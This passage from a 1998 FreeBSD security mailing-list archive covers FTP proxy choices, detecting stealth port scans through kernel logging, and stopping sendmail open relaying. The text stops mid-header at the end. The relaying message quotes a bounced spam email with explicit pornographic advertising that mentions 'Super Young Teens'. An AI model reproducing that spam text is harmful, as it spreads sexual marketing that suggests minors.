Wed, 16 Sep 1998 20:12:14 -0500 (CDT) (envelope-from cdillon@wolves.k12.mo.us) Date: Wed, 16 Sep 1998 20:12:14 -0500 (CDT) From: Chris Dillon X-Sender: cdillon@duey.hs.wolves.k12.mo.us To: Allen Smith cc: isp@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: Copyleft/BSD Copyright FTP Proxy Software In-Reply-To: <9809161740.ZM9973@beatrice.rutgers.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 16 Sep 1998, Allen Smith wrote: > Hi. Anybody know of any good Copyleft or BSD Copyright FTP Proxy > Software? SOCKS version 4 is no longer being supported by its > developers, so far as I can tell. > > Thanks, > > -Allen > > P.S. I'm wanting copyleft or BSD copyright because those tend to get > security and other fixes a lot faster, plus I have in mind some > improvements to the normal proxy server functions that I'd like to be > able to distribute. > > -- > Allen Smith easmith@beatrice.rutgers.edu > The Squid Proxy and Object Cache handles both HTTP and FTP proxy and caching. It exists in the FreeBSD ports collection and more info can be found at http://squid.nlanr.net. It is in my experience a very good solution, and apparently very popular. -- Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net /* FreeBSD: The fastest and most stable server OS on the planet. For Intel x86 and compatibles (SPARC and Alpha under development) (http://www.freebsd.org) */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 18:14:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA02912 for freebsd-security-outgoing; Wed, 16 Sep 1998 18:14:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from duey.hs.wolves.k12.mo.us (duey.hs.wolves.k12.mo.us [207.160.214.9]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA02822; Wed, 16 Sep 1998 18:14:06 -0700 (PDT) (envelope-from cdillon@wolves.k12.mo.us) Received: from duey.hs.wolves.k12.mo.us (cdillon@duey.hs.wolves.k12.mo.us [207.160.214.9]) by duey.hs.wolves.k12.mo.us (8.8.7/8.8.7) with SMTP id UAA14976; Wed, 16 Sep 1998 20:13:38 -0500 (CDT) (envelope-from cdillon@wolves.k12.mo.us) Date: Wed, 16 Sep 1998 20:13:37 -0500 (CDT) From: Chris Dillon X-Sender: cdillon@duey.hs.wolves.k12.mo.us To: Allen Smith cc: isp@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: Copyleft/BSD Copyright FTP Proxy Software In-Reply-To: <9809161857.ZM22358@beatrice.rutgers.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 16 Sep 1998, Allen Smith wrote: > I'm sorry, I didn't specify sufficiently. We're needing to support FTP > PUTs, so squid won't work (even if it wasn't for browsers, not command > line FTP programs). We're about to be using FreeBSD for a firewall for > IRIX machines, and the Socks version 4, as well as not being supported > currently (or at least not well supported), doesn't work right on > IRIX. I've asked on the Socks mailing list about this problem, and the > only reply I got was to go to the (restrictively copyrighted) version > of Socks 5. Incidentally, if there's one out there that'll do well, > I'm willing to try making the proxy server portion of it into a port. > > Thanks, > > -Allen > > -- > Allen Smith easmith@beatrice.rutgers.edu Hmmph.. Teach me to not read ahead for relevant replies or "errata" before I post. :-) -- Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net /* FreeBSD: The fastest and most stable server OS on the planet. For Intel x86 and compatibles (SPARC and Alpha under development) (http://www.freebsd.org) */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 18:49:47 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA10831 for freebsd-security-outgoing; Wed, 16 Sep 1998 18:49:47 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hillbilly.hayseed.net (hillbilly.hayseed.net [204.62.130.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA10809; Wed, 16 Sep 1998 18:49:36 -0700 (PDT) (envelope-from enkhyl@hayseed.net) Received: from hillbilly.hayseed.net (hillbilly.hayseed.net [204.62.130.2]) by hillbilly.hayseed.net (8.9.1/8.8.5) with SMTP id SAA25544; Wed, 16 Sep 1998 18:49:04 -0700 Date: Wed, 16 Sep 1998 18:49:04 -0700 (PDT) From: Enkhyl To: Chris Dillon cc: Allen Smith , isp@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: Copyleft/BSD Copyright FTP Proxy Software In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 16 Sep 1998, Chris Dillon wrote: > On Wed, 16 Sep 1998, Allen Smith wrote: > > > Hi. Anybody know of any good Copyleft or BSD Copyright FTP Proxy > > Software? SOCKS version 4 is no longer being supported by its > > developers, so far as I can tell. > > > > Thanks, > > > > -Allen > > > > P.S. I'm wanting copyleft or BSD copyright because those tend to get > > security and other fixes a lot faster, plus I have in mind some > > improvements to the normal proxy server functions that I'd like to be > > able to distribute. > > > > -- > > Allen Smith easmith@beatrice.rutgers.edu > > > > The Squid Proxy and Object Cache handles both HTTP and FTP proxy and > caching. It exists in the FreeBSD ports collection and more info can be > found at http://squid.nlanr.net. It is in my experience a very good > solution, and apparently very popular. This is fine if you don't mind massive buffer overflow potential. Squid is not what I would call a security-minded piece of software. Just my $0.02 from perusing the source. -- Christopher Nielsen Scient: The Art and Science of Electronic Business cnielsen@scient.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 19:14:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA13989 for freebsd-security-outgoing; Wed, 16 Sep 1998 19:14:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA13962; Wed, 16 Sep 1998 19:14:17 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id WAA14229; Wed, 16 Sep 1998 22:13:45 -0400 (EDT) From: "Allen Smith" Message-Id: <9809162213.ZM14227@beatrice.rutgers.edu> Date: Wed, 16 Sep 1998 22:13:45 -0400 In-Reply-To: Enkhyl "Re: Copyleft/BSD Copyright FTP Proxy Software" (Sep 16, 9:49pm) References: X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: Enkhyl , Chris Dillon Subject: Re: Copyleft/BSD Copyright FTP Proxy Software Cc: isp@FreeBSD.ORG, security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sep 16, 9:49pm, Enkhyl (possibly) wrote: > On Wed, 16 Sep 1998, Chris Dillon wrote: > > The Squid Proxy and Object Cache handles both HTTP and FTP proxy and > > caching. It exists in the FreeBSD ports collection and more info can be > > found at http://squid.nlanr.net. It is in my experience a very good > > solution, and apparently very popular. > > This is fine if you don't mind massive buffer overflow potential. Squid is > not what I would call a security-minded piece of software. > > Just my $0.02 from perusing the source. The 1.2 version, albeit less stable than the 1.1 version, is improved in this respect, such as via replacing sprintf with snprintf. I'm planning on compiling any FTP proxy with libparanoia or similar in any event. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 20:24:51 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA26448 for freebsd-security-outgoing; Wed, 16 Sep 1998 20:24:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Mercury.unix.acs.cc.unt.edu (mercury.acs.unt.edu [129.120.220.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA26335 for ; Wed, 16 Sep 1998 20:24:01 -0700 (PDT) (envelope-from john@unt.edu) Received: from leonardo.cascss.unt.edu (leonardo.cascss.unt.edu [129.120.32.203]) by Mercury.unix.acs.cc.unt.edu (8.8.8/8.8.8) with ESMTP id WAA14128 for ; Wed, 16 Sep 1998 22:23:34 -0500 (CDT) Received: (from john@localhost) by leonardo.cascss.unt.edu (8.8.8/8.6.9) id WAA18072 for freebsd-security@freebsd.org; Wed, 16 Sep 1998 22:19:29 -0500 (CDT) From: john Message-Id: <199809170319.WAA18072@leonardo.cascss.unt.edu> Subject: Are we vulnerable to "stealth" port scans? To: freebsd-security@FreeBSD.ORG Date: Wed, 16 Sep 1998 22:19:29 -0500 (CDT) X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org See http://www.2600.com/phrack/p49-15.html for a description of two "stealth" port scan methods. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 21:29:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA09708 for freebsd-security-outgoing; Wed, 16 Sep 1998 21:29:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from vcd.com (www.vcd.com [205.231.12.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA09650; Wed, 16 Sep 1998 21:28:45 -0700 (PDT) (envelope-from efb@vcd.com) Received: (from efb@localhost) by vcd.com (8.8.3/8.8.3) id VAA12368; Wed, 16 Sep 1998 21:27:39 -0700 (PDT) Date: Wed, 16 Sep 1998 21:27:39 -0700 (PDT) From: Everett Batey Message-Id: <199809170427.VAA12368@vcd.com> To: questions@FreeBSD.ORG, security@FreeBSD.ORG Subject: How do I get rid of Relaying on FBSD 2.1.6 Cc: admin@vcd.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org We are running FreeBSD 2.1.6 .. Sendmail 8.8.3 and being destroyed continuously .. I am not ready to go to Qmail on this site .. Is there any RULE for "I WONT FORWARD these_guys" from or to .. H E L P ... /Everett/ These qf and df files .. ... is a MIME-encapsulated message --VAK12188.906005236/vcd.com The original message was received at Fri, 11 Sep 1998 20:33:57 -0700 (PDT) from sdn-ar-001flfmyeP260.dialsprint.net [168.191.85.150] ----- The following addresses had permanent fatal errors ----- ----- Transcript of session follows ----- 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout ... while talking to ya.mx.aol.com.: >>> MAIL From: SIZE=1514 <<< 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). ... while talking to zc.mx.aol.com.: >>> MAIL From: SIZE=1514 <<< 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). ,,,,,,,,,,... Deferred: 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout 451 ... surfree.net: Name server timeout Message could not be delivered for 5 days Message will be deleted from queue 451 ... surfree.net: Name server timeout --VAK12188.906005236/vcd.com Content-Type: message/delivery-status Reporting-MTA: dns; vcd.com Arrival-Date: Fri, 11 Sep 1998 20:33:57 -0700 (PDT) Final-Recipient: RFC822; mk2axis@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkewisc@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkiczek@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkida79796@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkin749330@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkiss123@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkjgtvv@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkkl1@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mklein9910@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mklm0047@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkm57@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkmehrd9@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkmeurdog@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkmn96@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkue318@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkv36@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) Final-Recipient: RFC822; mkwesiga@aol.com Action: failed Status: 4.4.7 Remote-MTA: DNS; zc.mx.aol.com Diagnostic-Code: SMTP; 450 ... Sender domain not found in DNS (see RFC 1123, sections 5.2.2 and 5.2.18). Last-Attempt-Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) --VAK12188.906005236/vcd.com Content-Type: message/rfc822 Return-Path: Received: from vw9njrN0C (sdn-ar-001flfmyeP260.dialsprint.net [168.191.85.150]) by vcd.com (8.8.3/8.8.3) with SMTP id UAA18995; Fri, 11 Sep 1998 20:33:57 -0700 (PDT) From: vQ6l96KiI@surfree.net Message-Id: <199809120333.UAA18995@vcd.com> DATE: 11 Sep 98 11:39:50 PM TO: fatman@uswest.net SUBJECT: Best Porn Site On Yhe Web

For The Biggest, Boldest, and Dirtiest Adult Site on the Net... * Cum Shots * Wild Orgies * Deep Throat Blow Jobs * Lesbian Action * Gays * Bondage * Fetishes * Voyeur * Super Young Teens * Hardcore Penetration ...and Much, Much More! Simply Click Here To CUM On In

-------------------------------------------------------------------------------------------- You were introduced to us as someone who is over 18 and interested in adult related material. If this is not the case, please accept our sincerest appologies. Simply click right here and type "REMOVE" in the subject field. This will automatically block you from any future mailings. --------------------------------------------------------------------------------------------

--VAK12188.906005236/vcd.com-- V2 T906005236 K0 N0 P31614 I4/131076/415 Fr $rinternal $slocalhost $_localhost SMAILER-DAEMON RPF: H?P?Return-Path: HReceived: from localhost (localhost) by vcd.com (8.8.3/8.8.3) with internal id VAK12188; Wed, 16 Sep 1998 21:07:16 -0700 (PDT) H?D?Date: Wed, 16 Sep 1998 21:07:16 -0700 (PDT) H?F?From: Mail Delivery Subsystem H?x?Full-Name: Mail Delivery Subsystem H?M?Message-Id: <199809170407.VAK12188@vcd.com> HTo: HMIME-Version: 1.0 HContent-Type: multipart/report; report-type=delivery-status; boundary="VAK12188.906005236/vcd.com" HSubject: Returned mail: Cannot send message within 5 days HAuto-Submitted: auto-generated (failure) . To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 23:44:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA02044 for freebsd-security-outgoing; Wed, 16 Sep 1998 23:44:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA02012 for ; Wed, 16 Sep 1998 23:44:22 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id XAA06109; Wed, 16 Sep 1998 23:43:57 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Wed, 16 Sep 1998 23:43:55 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: john cc: freebsd-security@FreeBSD.ORG Subject: Re: Are we vulnerable to "stealth" port scans? In-Reply-To: <199809170319.WAA18072@leonardo.cascss.unt.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I wouldn't use the word "vulnerable", but yes, most TCP stacks will in one way or another respond to Steal scans. On my system I modifed kernel to log via net.inet.tcp.log_in_vain sysctl variable not only SYN packets but all other packets. If someone would be to do this stealth scan on you, you could still notice: Sep 11 22:58:50 twentythree /kernel: Connection attempt to TCP 199.51.61.23:1 from 199.51.61.22:1<6>FIN<6>RST<6>PUSH<6>URG<6> Sep 11 22:58:50 twentythree /kernel: Connection attempt to TCP 199.51.61.23:1 from 199.51.61.22:1<6>RST<6> Sep 11 22:58:50 twentythree /kernel: Connection attempt to TCP 199.51.61.23:1 from 199.51.61.22:1<6>ACK<6>FIN<6>RST<6>URG<6> Also, one can setup something like NFR to watch for port scans on the network. -- Yan I don't have the password .... + Jan Koum But the path is chainlinked .. | Spelled Jan, pronounced Yan. There. So if you've got the time .... | Web: http://www.best.com/~jkb Set the tone to sync ......... + OS: http://www.FreeBSD.org On Wed, 16 Sep 1998, john wrote: >See http://www.2600.com/phrack/p49-15.html >for a description of two "stealth" port >scan methods. > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 17 00:44:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA13907 for freebsd-security-outgoing; Thu, 17 Sep 1998 00:44:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA13844 for ; Thu, 17 Sep 1998 00:43:53 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.1/8.8.5) with ESMTP id JAA08633; Thu, 17 Sep 1998 09:38:06 +0200 (CEST) To: "Jan B. Koum " cc: john , freebsd-security@FreeBSD.ORG Subject: Re: Are we vulnerable to "stealth" port scans? In-reply-to: Your message of "Wed, 16 Sep 1998 23:43:55 PDT." Date: Thu, 17 Sep 1998 09:38:05 +0200 Message-ID: <8631.906017885@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org patches ? In message , "Jan B. Koum " writes: > > I wouldn't use the word "vulnerable", but yes, most TCP stacks >will in one way or another respond to Steal scans. On my system I modifed >kernel to log via net.inet.tcp.log_in_vain sysctl variable not only SYN >packets but all other packets. If someone would be to do this stealth scan >on you, you could still notice: > >Sep 11 22:58:50 twentythree /kernel: Connection attempt to TCP >199.51.61.23:1 from 199.51.61.22:1<6>FIN<6>RST<6>PUSH<6>URG<6> > >Sep 11 22:58:50 twentythree /kernel: Connection attempt to TCP >199.51.61.23:1 from 199.51.61.22:1<6>RST<6> > >Sep 11 22:58:50 twentythree /kernel: Connection attempt to TCP >199.51.61.23:1 from 199.51.61.22:1<6>ACK<6>FIN<6>RST<6>URG<6> > > Also, one can setup something like NFR to watch for port scans on >the network. > >-- Yan > >I don't have the password .... + Jan Koum >But the path is chainlinked .. | Spelled Jan, pronounced Yan. There. >So if you've got the time .... | Web: http://www.best.com/~jkb >Set the tone to sync ......... + OS: http://www.FreeBSD.org > >On Wed, 16 Sep 1998, john wrote: > >>See http://www.2600.com/phrack/p49-15.html >>for a description of two "stealth" port >>scan methods. >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of the message >> > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." "ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 17 02:08:44 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA29200 for freebsd-security-outgoing; Thu, 17 Sep 1998 02:08:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.ftf.dk (mail.ftf.net [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA29159; Thu, 17 Sep 1998 02:08:24 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id LAA21146; Thu, 17 Sep 1998 11:13:15 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk) Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id LAA27747; Thu, 17 Sep 1998 11:22:02 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id LAA15613; Thu, 17 Sep 1998 11:12:40 +0200 (CEST) Message-ID: <19980917111240.62789@deepo.prosa.dk> Date: Thu, 17 Sep 1998 11:12:40 +0200 From: Philippe Regnauld To: Everett Batey Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG, admin@vcd.com Subject: Re: How do I get rid of Relaying on FBSD 2.1.6 References: <199809170427.VAA12368@vcd.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88e In-Reply-To: <199809170427.VAA12368@vcd.com>; from Everett Batey on Wed, Sep 16, 1998 at 09:27:39PM -0700 X-Operating-System: FreeBSD 2.2.6-RELEASE i386 Phone: +45 3336 4148 Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Everett Batey writes: > > We are running FreeBSD 2.1.6 .. Sendmail 8.8.3 and being destroyed > continuously .. I am not ready to go to Qmail on this site .. Is there > any RULE for "I WONT FORWARD these_guys" from or to .. H E L P ... Sendmail 8.9 -- can be conf'ed to only relay the hosts for which you are declared MX. Sendmail 8.8.x -- see www.sendmail.org -- lots o' rulesets et al. -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- The Internet is busy. Please try again later. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 17 04:34:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA22139 for freebsd-security-outgoing; Thu, 17 Sep 1998 04:34:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-11.igrin.co.nz [202.49.245.90]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA22132; Thu, 17 Sep 1998 04:34:19 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id XAA00855; Thu, 17 Sep 1998 23:33:35 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Thu, 17 Sep 1998 23:33:35 +1200 (NZST) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Allen Smith cc: isp@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: Copyleft/BSD Copyright FTP Proxy Software In-Reply-To: <9809161857.ZM22358@beatrice.rutgers.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 16 Sep 1998, Allen Smith wrote: > I'm sorry, I didn't specify sufficiently. We're needing to support FTP > PUTs, so squid won't work (even if it wasn't for browsers, not command > line FTP programs). We're about to be using FreeBSD for a firewall for > IRIX machines, and the Socks version 4, as well as not being supported > currently (or at least not well supported), doesn't work right on > IRIX. I've asked on the Socks mailing list about this problem, and the > only reply I got was to go to the (restrictively copyrighted) version > of Socks 5. Incidentally, if there's one out there that'll do well, > I'm willing to try making the proxy server portion of it into a port. delegated in the ports collection provides FTP PUT along with a wide range of other proxy services. It won't give you the performance of squid. I haven't looked at it's source or heard any comments on it's security. Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 17 04:34:54 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA22223 for freebsd-security-outgoing; Thu, 17 Sep 1998 04:34:54 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.224.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA22203 for ; Thu, 17 Sep 1998 04:34:46 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199809171134.EAA22203@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA181931634; 